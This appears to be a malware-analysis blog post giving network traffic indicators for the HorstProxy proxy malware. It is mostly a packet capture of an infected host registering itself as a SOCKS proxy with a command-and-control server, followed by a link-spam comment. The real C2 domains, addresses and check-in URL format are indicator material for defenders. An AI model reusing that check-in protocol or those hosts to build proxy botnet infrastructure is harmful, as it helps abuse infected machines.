HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

By | July 25, 2015

2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125

E….;@…i…..E+…!.P.r……P…F\..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1

User-Agent: Mozilla/5.0

Host: ldark.com

 

 

2013-05-12 14:32:23.969386 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [.], ack 126, win 64240, length 0

E..(……..E+…….P.!…..r..P………….

2013-05-12 14:32:24.102970 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [FP.], seq 1:290, ack 126, win 64240, length 289

E..I……..E+…….P.!…..r..P….e..HTTP/1.1 302 Found

Date: Tue, 14 May 2013 02:49:49 GMT

Server: Apache

X-Powered-By: PHP/5.3.3-7+squeeze15

Location: http://ww41.ldark.com/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

2013-05-12 14:32:24.350664 IP 172.16.253.129.1059 > 141.8.224.79.80: Flags [P.], seq 1:155, ack 1, win 64240, length 154

E….D@…………O.#.P.;k…V.P…>%..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1

User-Agent: Mozilla/5.0

Host: ww41.ldark.com

Connection: Keep-Alive

Share Button

One thought on “HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *